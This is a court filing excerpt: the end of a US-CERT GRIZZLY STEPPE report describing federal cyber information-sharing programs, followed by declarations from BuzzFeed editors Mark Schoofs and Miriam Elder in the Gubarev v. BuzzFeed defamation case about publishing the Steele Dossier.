- **The Cybersecurity Information Sharing and Collaboration Program (CISCP)** is a voluntary information-sharing and collaboration program between and among critical

**TLP:WHITE**

infrastructure partners and the Federal Government. For more information, email CISCP@us-cert.gov.

- **The Automated Indicator Sharing (AIS)** initiative is a DHS effort to create a system where as soon as a company or federal agency observes an attempted compromise, the indicator will be shared in real time with all of our partners, protecting them from that particular threat. That means adversaries can only use an attack once, which increases their costs and ultimately reduces the prevalence of cyber-attacks. While AIS will not eliminate sophisticated cyber threats, it will allow companies and federal agencies to concentrate more on them by clearing away less sophisticated attacks.

  AIS participants connect to a DHS-managed system in the NCCIC that allows bidirectional sharing of cyber threat indicators. A server housed at each participant's location allows each to exchange indicators with the NCCIC. Participants will not only receive DHS-developed indicators, but can share indicators they have observed in their own network defense efforts, which DHS will then share with all AIS participants. For more information, visit https://www.dhs.gov/ais.

- **The Cybersecurity Framework (Framework)**, developed by the National Institute of Standards and Technology (NIST) in collaboration with the public and private sectors, is a tool that can improve the cybersecurity readiness of entities. The Framework enables entities, regardless of size, degree of cyber risk, or cyber sophistication, to apply principles and best practices of risk management to improve the security and resiliency of critical infrastructure. The Framework provides standards, guidelines, and practices that are working effectively today. It consists of three parts—the Framework Core, the Framework Profile, and Framework Implementation Tiers—and emphasizes five functions: Identify, Protect, Detect, Respond, and Recover. Use of the Framework is strictly voluntary. For more information, visit https://www.nist.gov/cyberframework or email cyberframework@nist.gov.

**TLP:WHITE**

**TLP:WHITE**

## Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. Include the JAR reference number (JAR-16-20296A) in the subject line of all email correspondence. For any questions related to this report, please contact NCCIC or the FBI.

*NCCIC:*
Phone: +1-888-282-0870
Email: NCCICCustomerService@hq.dhs.gov

*FBI:*
Phone: +1-855-292-3937
Email: cywatch@ic.fbi.gov

## Feedback

NCCIC continuously strives to improve its products and services. You can help by answering a few short questions about this product at the following URL:
https://www.us-cert.gov/forms/feedback.

**TLP:WHITE**

Exhibit 4

**IN THE UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**
**Case No.: 17-cv-60426-UU**

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.

   Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

   Defendants.

_____/

## DECLARATION OF MARK SCHOOFS

I, Mark Schoofs, declare as follows:

1.      I am employed by Defendant BuzzFeed, Inc. ("BuzzFeed") as the investigations and projects editor at BuzzFeed News. I live in Manhattan, New York, and work at BuzzFeed's headquarters in New York City. I submit this declaration in support of Defendants' motion for summary judgment in this action. I am familiar with the facts herein and make this declaration from my own personal knowledge.

2.      I am one of the journalists with a byline on the article *These Reports Allege Trump Has Deep Ties To Russia*, published by BuzzFeed News on January 10, 2017 (the "Article").

3.      As BuzzFeed News's investigations and projects editor, I supervise and direct its investigative journalism. Before joining BuzzFeed in 2014, I was a senior editor at ProPublica and spent ten years as a foreign correspondent and investigative journalist for *The Wall Street Journal*. I have won or shared two Pulitzer Prizes: in 2000, while a staff reporter at the *Village*

4812-1658-8147v.1 0100812-000009

*Voice*, I won the Pulitzer Prize for an eight-part series about the AIDS crisis in Africa, and in 2002, I was part of the large *Wall Street Journal* team that won the Pulitzer Prize for its breaking news coverage of the 9/11 terrorist attacks.  I have also won the American Association for the Advancement of Science's Science Journalism Award, the New York Association of Black Journalists Award for International Reporting, and the Overseas Press Club Bob Considine Award.

4.      As of December 1, 2018, I will be joining the Annenberg School of Journalism at the University of Southern California, where I will be leading investigative journalism programming.

5.      One of the BuzzFeed investigative reporters I supervise is Ken Bensinger.  On or about December 2, 2016, Ken called and said one or more sources had told him that Christopher Steele, a respected former MI6 agent with extensive Russia experience, had produced a series of memos alleging that the Russian government had gathered compromising information about President-elect Trump.  Ken also said that Mr. Steele had delivered a copy of the Dossier to the FBI.  Although he was on leave at the time to write a book, I asked Ken to try to confirm that the Dossier existed and obtain a copy.

6.      Over the next few weeks, Ken gave me updates on his progress, but he was not able to obtain a copy of the Dossier.  Shortly before Christmas, I received an email from BuzzFeed Editor-in-Chief Ben Smith suggesting that we contact ███████████ about the Dossier.  I passed that tip along to Ken.

7.      On December 29, Ken let me know that he had received a copy of the Dossier ███████████, and he sent me photos of the Dossier.  The document closely matched the

document described in David Corn's October 31, 2016 *Mother Jones* article entitled *A Veteran Spy Has Given the FBI Information Alleging a Russian Operation to Cultivate Donald Trump*.

8. ███████████ ████████ ████████████████████

███████████████████ █████████ █████████████

████████████████████████████████████████████

████████████

9.    After I read the Dossier, I realized that some of its specific, factual allegations had already been verified in broad outline.  For example, that Russia was behind the hacking of Democratic party leaders and leaking their e-mails to Wikileaks had already been discussed in several news articles that I had read and by Crowdstrike, the private security firm that was hired to investigate the hack of the DNC.  And, in fact, on the very same day we received the Dossier, the United States released a report, called "GRIZZLY STEPPE – Russian Malicious Cyber Activity" that detailed the efforts of Russian State Actors to interfere in the United States election.  In addition, press reports about Carter Page's meeting with Russian officials first surfaced in or around September 2016.  I recognized, however, that what I considered to be two of the Dossier's core allegations – that Russia had deliberately cultivated and held "kompromat" on President-elect Trump, and that Russia had engaged in a wide-ranging effort to influence the 2016 Presidential election – were not yet verified.  I also thought that it would likely be difficult for a news organization to independently verify many of the allegations.  Definitive proof of some of the allegations, such as the existence of a sex video, might only be possessed by the Russian government.  And the sheer breadth of detail in the 35 pages of the Dossier would likely be more than a news organization with BuzzFeed's resources could try to track down.

10.     As a result, after consulting with my colleagues I thought it best for BuzzFeed to try to investigate a few of the allegations that we thought might be capable of independent verification.  As I recall, those included whether Michael Cohen had traveled to Prague, and the nature of the pension payments system described in the Dossier.  So we assigned a team of reporters who, to varying degrees, worked on the investigation.  Stuart Millar, an editor in London, helped coordinate investigation efforts by reporters in London, as did Heidi Blake, BuzzFeed's UK investigations editor.  Under Heidi's and my supervision, one of our London-based investigative reporters, Jane Bradley, went to Prague from London to see if any hotels there would tell us whether Mr. Cohen had stayed there (the hotels she visited would and/or did not tell us, or told us that Michael Cohen did not stay there).  Miriam Elder, Sheera Frankel, Ali Watkins and Aram Roston were also involved, as was Ken Bensinger.

11.     As of January 10, 2017, we had not yet confirmed nor refuted any of the Dossier's allegations we had set out to investigate.  This did not surprise me, as I expected that it might prove difficult to verify or refute them.

12.     That afternoon, CNN published an article reporting that the Dossier had become the subject of, among other things, a government investigation and briefings given by senior intelligence officials to the President and President-elect.  Shortly after CNN published its article, I met with Ben Smith, Miriam Elder, and BuzzFeed Executive Editor Shani Hilton to discuss whether to publish the Dossier itself.  Although the final decision to publish was made by Ben, I agreed with it.  We also agreed, however, not to present the Dossier to our readers as established fact, but to make clear that, despite its role in official activity, its core allegations remained unverified.

13.     Although I knew of course that the allegations were unverified, I believed its allegations were credible and plausible for a number of reasons.  Its author was a respected former British intelligence agent with deep connections in Russia, and U.S. government authorities evidently took its allegations seriously enough to brief the President and President-elect about them.  I understood from Ken that ███████ appeared to him to be a serious and credible person who took the Dossier's allegations very seriously.  In addition, the Dossier's allegations, including those contained in the December Memo, fit with Donald Trump's regular praise for Vladimir Putin, with months of public reports apparently establishing that the Russian government-backed hackers were responsible for hacking the Democratic National Committee and other officials close to Hillary Clinton, and with reports about Carter Page's trip to Moscow. The events described in the Dossier were also consistent with the dismissal of Sergei Ivanov, the Presidential Administration head who the Dossier claims opposed Russian interference in the election, and the recall of Mikhail Kalugin, a Russian diplomat who the Dossier claims was at risk of being exposed for participating in the election interference.   I also thought it significant that Senator McCain had apparently thought it sufficiently important to deliver the document to James Comey, then the director of the FBI.

14.     Before reading the December Memo, I had never heard of Aleksej Gubarev, XBT, or Webzilla.  The specific allegations about "Gubarov" and "XBT/Webzilla" struck me as credible and plausible.  They were specific details about a broader allegation which had been publicly investigated and confirmed – that Russia was responsible for the Democratic Party hack. There also were details relating to the Dossier's broader allegations about Michael Cohen, which I thought were consistent with Cohen's known role as Trump's "fixer."  I had no awareness that

the allegations referred to in paragraph 26 of the Complaint were false or probably false, nor did I have serious doubts about their accuracy.

15.     I drafted the article which BuzzFeed ultimately published with the Dossier ("the Article").   Miriam Elder, who is an expert on Russia, corrected certain factual details and pointed out the errors we cited in the Dossier, and Ben Smith edited it.  Ken Bensinger then suggested a minor change by telephone.  Our intention in writing the Article was not to present the Dossier's core allegations as fact.  Rather, the purpose of the Article was to explain what the Dossier was and the role the Dossier had come to play in government-decision making.  I thought it important to be clear to readers that by that point we had neither independently verified the Dossier nor had we found any of its key allegations to be false; to note where we had noticed a couple of factual errors; and to explain that the Dossier was prepared by political opponents of President-elect Trump.

16.     Shortly after the Dossier was published, I learned that Ken Bensinger had been contacted with concerns about the safety of Steele's sources.  We then redacted some information regarding one source we thought might be more readily identifiable.

17.     I believed then and believe now that publishing the Dossier was the right thing to do as a news organization.  I do not think it would be possible to understand what has happened in our nation had the Dossier not been published.  I also have no doubt that had BuzzFeed not published the Dossier on January 10, 2017, others would have inevitably published it thereafter given its importance in government activity and political debate.

I declare under penalty of perjury that the foregoing is true and correct.

Executed on:  September 19, 2018

_____
Mark Schoofs

6

Exhibit 5

<div style="text-align:center">

**IN THE UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**
**Case No.: 17-cv-60426-UU**

</div>

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.

   Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

   Defendants.

_____/

<div style="text-align:center">

**<u>DECLARATION OF MIRIAM ELDER</u>**

</div>

I, Miriam Elder, declare as follows:

1.      I am employed by Defendant BuzzFeed, Inc. ("BuzzFeed") as the world editor at BuzzFeed News.  I live in Manhattan, New York and work at BuzzFeed's headquarters in New York City.  I submit this declaration in support of Defendants' motion for summary judgment in this action.  I am familiar with the facts herein and make this declaration from my own personal knowledge.

2.      I am one of the journalists with a byline on the article *These Reports Allege Trump Has Deep Ties to Russia*, published by BuzzFeed News on January 10, 2017 (the "Article").

3.      As BuzzFeed News's world editor, I supervise and direct its foreign coverage.  I personally, however, have particular interest and experience in covering Russia.  I am fluent in Russian, and before joining BuzzFeed News in 2013, I spent seven years in Russia, two years as *The Guardian*'s Moscow Bureau Chief, three years as a freelance reporter, including stringing

for the *Guardian* and two years at the *Moscow Times*.  Before that, I worked for *Agence France Presse* and the *International Herald Tribune*, which included a stint as a Russia correspondent for AFP from 2002-2003.  I hold a B.A. from Barnard College and an M.A. from Johns Hopkins University's School of Advanced International Studies, with a focus on strategic studies and international economics.  My reporting at BuzzFeed has focused on Russia, and I am often interviewed or asked to speak on issues related to Russia.

4.      I first became aware of the document attached as Exhibit C to Plaintiffs' Complaint (the "Dossier") in late December 2016.  I received a copy of the Dossier from BuzzFeed investigation editor Mark Schoofs.  I reviewed the entire Dossier and noticed certain factual errors, namely a misspelling of Alfa Group and a claim that the settlement of Barvikha is "reserved for the residences of the top leadership and their close associates," when in fact it is not reserved for anyone and is also populated by very wealthy Russians.  I did not consider these to be errors in the substance of allegations in the Dossier.

5.      I believed the Dossier's substance was plausible because it was consistent with things I knew – including, among other things: (a) Donald Trump's repeated praise for Vladimir Putin and his autocratic regime; (b) the penchant of Russian intelligence services for conducting surveillance on prominent foreigners visiting Russia; (c) Russian intelligence services' use of *kompromat* to gain leverage over potential sources, (d) months of credible public reports about the Russian government's role in the hack of the Democratic National Committee (the "DNC Hack"); and (e) Sergei Ivanov's replacement as head of the Russian Presidential Administration in the summer of 2016, shortly after the Dossier reported that he was "angry" about Russian interference in the US election.  The Dossier's reporting on Trump campaign advisor Carter Page was also consistent with a September 2016 Yahoo! News report about the U.S. intelligence

2

community's interest in Page's trip to Moscow and the possibility that he had "opened up private communications with senior Russian officials."

6.      As part of my review of the Dossier, I read Company Report 2016/166 (the "December Memo").  Before reading the Dossier, I do not believe I had ever heard of Aleksej Gubarev, XBT, or Webzilla.  The allegations in the December Memo also seemed plausible, both because of what I said above about the credibility of the Dossier as a whole, and because these allegations in particular seemed consistent with public reports (including those from the US government) detailing the role of Russian-backed hackers in the DNC Hack.

7.      On January 10, 2017, I saw that CNN had published an article reporting that the Dossier had, among other things, become the subject of briefings to President Obama and President-elect Trump and US government investigations.  Because of my Russia expertise, Ben Smith and Mark Schoofs asked me to join in their discussion about whether to publish the Dossier.  I supported publishing it because I believed that, given CNN's report, the public had a right to know what the government was investigating and using as a basis for a presidential briefing.

8.      Mark Schoofs drafted the Article, and Ben Smith edited it.  I fixed some factual details in the Article, and BuzzFeed investigative reporter Ken Bensinger talked with us over the phone.

9.      At the time we published the Dossier, I did not believe that the allegations referred to in paragraph 26 of the Complaint were false.  While I knew the allegations were unconfirmed, I had no awareness of their being false or serious doubts about their accuracy.  To the contrary, for the reasons described above I believed that they were plausible and credible.

I declare under penalty of perjury that the foregoing is true and correct.

Executed on:  September 20, 2018

Miriam Elder

4845-4758-5907v.1 0100812-000009